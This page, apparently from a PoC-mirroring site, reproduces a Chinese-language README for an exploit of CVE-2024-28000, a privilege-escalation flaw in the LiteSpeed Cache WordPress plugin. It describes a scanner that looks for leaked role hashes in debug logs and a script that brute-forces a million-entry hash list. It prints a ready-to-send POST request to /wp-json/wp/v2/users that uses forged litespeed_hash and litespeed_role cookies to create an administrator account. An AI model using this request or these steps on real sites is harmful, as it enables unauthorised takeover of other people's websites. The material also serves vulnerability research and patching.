Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-28000 PoC — WordPress Plugin LiteSpeed Cache 安全漏洞

Source
https://github.com/SSSSuperX/CVE-2024-28000
Associated Vulnerability
Title:WordPress Plugin LiteSpeed Cache 安全漏洞 (CVE-2024-28000)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress Plugin LiteSpeed Cache 6.3.0.1及之前版本版本存在安全漏洞,该漏洞源于存在不正确的权限分配漏洞,允许权限提升。
Description
CVE-2024-28000 LiteSpeed Cache Privilege Escalation Scan&Exp
Readme
# LiteSpeed Cache Privilege Escalation Exp

## CVE-2024-28000_Scan.py
- 该脚本首先会识别版本,判断是否为易损版本,后尝试确认log文件是否存在,若存在,则会尝试发包后再次请求log文件尝试查找hash泄露,若LiteSpeed启用debug,则有可能泄露正确Hash
```
usage: CVE-2024-28000_Scan.py [-h] [-f F] [-t T] [-p PROXY]

CVE-2024-28000 Scan

optional arguments:
  -h, --help            show this help message and exit
  -f F                  File list
  -t T                  Scan thread
  -p PROXY, --proxy PROXY
                        Example: socks5://127.0.0.1:10808
```
示例:
```
09/08/24 16:30:38.219 [0.0.0.0:26008 1 TG9] 💓 ------POST HTTP/1.1 (HTTPS)  /wp-json/wp/v2/users
09/08/24 16:30:38.219 [0.0.0.0:26008 1 TG9] Query String: 
09/08/24 16:30:38.231 [0.0.0.0:26008 1 TG9] [Router] starting role validation
09/08/24 16:30:38.232 [0.0.0.0:26008 1 TG9] [Router] hash not match zasws5 != pkHrfD
09/08/24 16:30:38.232 [0.0.0.0:26008 1 TG9] [Router] get_role: 
09/08/24 16:30:38.241 [0.0.0.0:26008 1 TG9] [Optm] init
```
若LiteSpeed启用debug,则可能看到类似的上面的日志,其中pkHrfD则为正确Hash
## CVE-2024-28000_Exploit.py
- 经测试 Python和PHP生成的Hash是有差异的,故Hash列表并不能用Python模拟生成,Hash_list.txt文件为php生成的1000000个Hash,所以理论上遍历最高1000000次则可以遍历到正确Hash
```
usage: CVE-2024-28000_Exploit.py [-h] [-u U] [-t T] [-d D] [-p PROXY]

CVE-2024-28000

optional arguments:
  -h, --help            show this help message and exit
  -u U                  url
  -t T                  Scan thread
  -d D                  Dict list
  -p PROXY, --proxy PROXY
                        Example: socks5://127.0.0.1:10808
```
- -d参数则为Hash列表 -u为url -t为线程数,线程不建议过高

## 测试
- 在靶场测试是可以成功遍历出Hash,并且重装五遍都已经确认Hash是在生成的Hash列表中的,但是多种方面表面实战利用成功率较低
- 在成功找到正确Hash后可用下面的数据包添加admin用户

```
POST /wp-json/wp/v2/users HTTP/2
Host: xxx.com
User-Agent: python-requests/2.28.1
Accept-Encoding: gzip, deflate, br
Accept: */*
Cookie: litespeed_hash=正确Hash; litespeed_role=1
Content-Length: 122
Content-Type: application/json

{"username": "username", "password": "password", "email": "xadminx@example.com", "roles": ["administrator"]}
```
File Snapshot

 [4.0K]  /data/pocs/7b4d57850a98d765b621eefcbf1abd5c7de4ca9b
├── [3.3K]  CVE-2024-28000_Exploit.py
├── [6.6K]  CVE-2024-28000_Scan.py
├── [6.7M]  Hash_list.txt
├── [2.4K]  README.md
└── [  81]  requirements.txt

0 directories, 5 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.